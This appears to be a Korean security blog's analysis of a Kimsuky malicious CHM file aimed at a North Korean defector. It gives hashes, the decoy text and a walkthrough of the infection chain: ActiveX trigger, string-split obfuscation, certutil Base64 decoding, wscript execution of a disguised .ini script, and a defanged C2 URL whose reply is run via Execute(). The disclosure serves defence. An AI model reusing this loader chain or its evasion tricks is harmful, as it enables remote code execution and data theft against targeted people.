오늘도 즐겁게 탈북민 수의축산 출신 조xx 박사를 노린 Kimsuky(김수키)에서 만든 악성코드-Review.chm에 대해서 분석을 한번 해 보겠습니다.
파일명:Review.chm
사이즈:1 MB
MD5:e092e459bf259a8fc372d152c4a84245
SHA-1:4d9e2af49ebd0e4e490b4e2f85797da9244a16a4
SHA-256:0efbd18c77479b458078521c18bdad84852b71250122a17cb8105c10d3df38d4
이며 chm 즉 윈도우 도움말인 것처럼 하는 해당 부분은 거짓말을 해 놓은 악성코드임
해당 악성코드는 북한에서 수의사 겸 축산 전문 공무원으로 일하고 있다가 탈북한 수의사 출신 조XX 박사를 노린것으로 추정이 되는 악성코드입니다.
먼저 해당 악성코드 내용 그던데 S 방송사의 국방기자 이름이 언급되는 것이 특징

내용
몇 가지 식량권 감수의견을 드립니다/김??
▲ 목차를 매길 때, 1.가.1),가)순으로 해야 합니다.
▲ 원고는 아래와 같이 라. 부분에서,
라. 식량 위기 원인
1. 자원 배분의 왜곡과 민생 예산의 군비 전용
2. 농업생산 기반의 몰락과 지역 농업생산력 차이
3. 음식 문화의 경직성과 영양
인데, 실제 내용은 아래와 같습니다.
목차와 내용을 일치시켜야 하겠습니다.
1. 자원 배분의 왜곡과 민생 예산의 군비 전용
2. 농업생산 기반의 몰락과 지역 농업생산력의 차이
3. 식량자원 배분의 불평등
4. 음식 문화 문화의 경직성과 영양(營養)
▲ 음식 문화 문화의 경직성과 영양(營養)은 어색함.
그밖에도 내용에는 평어체와 존대말이 섞
이거나 표현상 어색한 부분이 있는바 시정이 필요하겠습니다.
▲ 식량위기의 원인을
1. 자원 배분의 왜곡과 민생 예산의 군비 전용,
2. 농업생산 기반의 몰
락과 지역 농업생산력의 차이,
3. 식량자원 배분의 불평등,
4. 음식 문화 문화의 경직성과 영양(營養) 등으로 꼽았다면 결론 부분도 여기에 맞춰 내용을 다듬는 것이 바람직해 보입니다.
▲ 본 백서는 법률가단체인 대한변호사협회의 출판물이기 때문에 가급적 규범이나 법률 규정
을 인용할 필요가 있습니다.
즉, 사회권위원회 일반논평 제12호 이외에 추가로 유엔 사회권규약(ICESCR) 제11조 제1항, 제2항의 식량권 관련 규정과 북한헌법(비록 지난 3월 개정된 내용을 입수할 수는 없지만)의 관련규정, 예컨대 제64조 및 제70조를 위반하고 있음을 추가로 언급함이 바람직합니다.
조??박사님, 수고하셨습니다.
악성코드 분석
원격 서버에서 VBScript 코드를 받아 메모리에서 Execute() 로 실행하는 목적
1.ActiveX 부분
악성 코드는 숨겨진 버튼에 객체를 동적으로 삽입
즉 사용자가 버튼을 직접 누르는 형태가 아니라 JavaScript을 호출해서 프로그램 실행
Google Chrome,Firefox,마이크로소프트 엣지 의 일반적인 환경에서는 이런 ActiveX 객체가 동작하지 않지만, 구형 Internet Explorer 또는 취약한 레거시 WebBrowser,ActiveX 호스트라면 동작

2.JavaScript 난독화
JavaScript 난독화을 통해서 문자열을 일부러 분리 문자열 기반 탐지를 우회하기 위한 매우 단순한 방법을 취함
즉 백신 프로그램이 powershell,-windowstyle hidden 연속 문자열을 찾는 것을 피하려는 의도로 제작됨
3.Base64 디코딩
문자열을 복원하면 Base64 로 인코딩된 부분을 보면 됩니다.
사실상 CyberChef로 보면 VBScript 가 보일 것입니다.
VBScript 상세 분석
On Error Resume Next 오류가 발생해도 중단하지 않게 설정
무작위 숫자 생성
대략 1~1000 범위의 난수를 생성
서버 요청
hxxp://acnms(.)dmdoc(.)dynv6(.)net/smltm/bootservice(.)php?tag=4372(&) query=1
용도 추측
HTTP 캐시 회피
요청별 식별 값
샌드박스 및 분석 시스템의 URL 정규화 방해
동일 URL 반복 탐지 회피
서버가 tag 를 실제 감염자 ID로 사용하는지까지 확인 불가

4.XMLHTTP 생성
COM 객체를 이용해 HTTP 통신을 수행
C2,페이로드 서버 접속
hxxp://acnms(.)dmdoc(.)dynv6(.)net/smltm/bootservice(.)php?tag=" +rnd_num +"&query=1",False
False이므로 synchronous request
요청이 완료될 때까지 실행은 대기
서버 응답 실행
mx.Send
Execute(mx(.)responseText)
즉 서버가 문자열을 그대로 VBScript 코드로 실행
실질적으로 전달하는 내용이 2차 페이로드
현재 HTML 자체에는 최종 악성 기능이 존재하지 않아도 되며
서버가 시점에 따라 RAT,stealer,downloader,ransomware loader 등의 작전을 실행
5.certutil 사용하는 이유
Windows에 기본 포함된 certutil.exe 를 Base64 디코더로 사용
역할
%USERPROFILE%\Links\Link.dat:Base64 문자열
%USERPROFILE%\Links\Link.ini:디코딩된 VBScript
특히 .ini 확장자는 VBScript ini 확장자로 위장
그렇게 되며 .vbs 확장자가 아니어도 실행할 수 있으며 탐지를 의도적으로 피하려는 목적이 됨
7.wscript.exe 옵션
//b:Batch mode
스크립트 오류나 사용자 인터페이스를 최대한 표시하지 않게 하려는 목적입니다.
즉 파일 확장자와 관계없이 VBScript 엔진으로 처리하기 위해서 사용이 됩니다.
요약
1.ActiveX ShortCut 기능을 이용해 PowerShell 실행
2.Base64 VBScript를 하드 디스크에 생성
3.certutil 로 Base64 복호화
4.wscript로 위장된 .ini 스크립트 실행
5.동적 DNS 서버 접속
6.bootservice(.)php가 반환한 코드를 Execute() 로 즉시 실행
정보 탈취, RAT 목적일 가능성이 매우 큼
이번에 탈북자 분들 많이 노리는 것 같은 탈북자 분들에게 이런 방식으로 북한 정찰정보 총 죽에서 이런 식으로 개인정보 등을 노리고 있으니 날 잡아서 안보 교육이 필요하지 않을까? 공권력이 하는 일에 훈수 한방 놓아 주고 갑니다.
결론 주적은 북한이다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| VPN 무력화한 GDID 텔레메트리와 안티포렌식 대응 방법 (0) | 2026.08.12 |
|---|---|
| 새로운 TONTOU CPU 공격 인한 Spectre v2 수정 사항 우회 리눅스 비밀번호 해시 유출 (0) | 2026.08.11 |
| Mustang Panda 추정 일본 외무성,방위성 노린것으로 추정 되는 악성코드-新段階に入った日印の戦略的関係.pdf.lnk (0) | 2026.08.10 |
| 북한 라자루스(Lazarus)로 추정 구글 크롬 웹 스토어 PolinRider 악성코드 분석-YouTube Translator: Captions, Transcript & AI Summary (0) | 2026.08.07 |
| 은행 명세서부터 진단서까지 구글 지메일 AI 스캔 기능 끄는 방법 (0) | 2026.08.06 |
| APT29 호텔 Wi-Fi 공격을 통해 맞춤형 악성 소프트웨어를 사용하여 Microsoft 365 계정 공격 (0) | 2026.08.05 |
| 자기소개서 로 위장한 김수키(Kimsuky)에서 만든 악성코드-이x연 자기소개서.pdf.lnk (0) | 2026.08.03 |
| 일본 BIGLOBE 피싱 사이트 분석-votingonline(.)co(.)in (0) | 2026.07.31 |





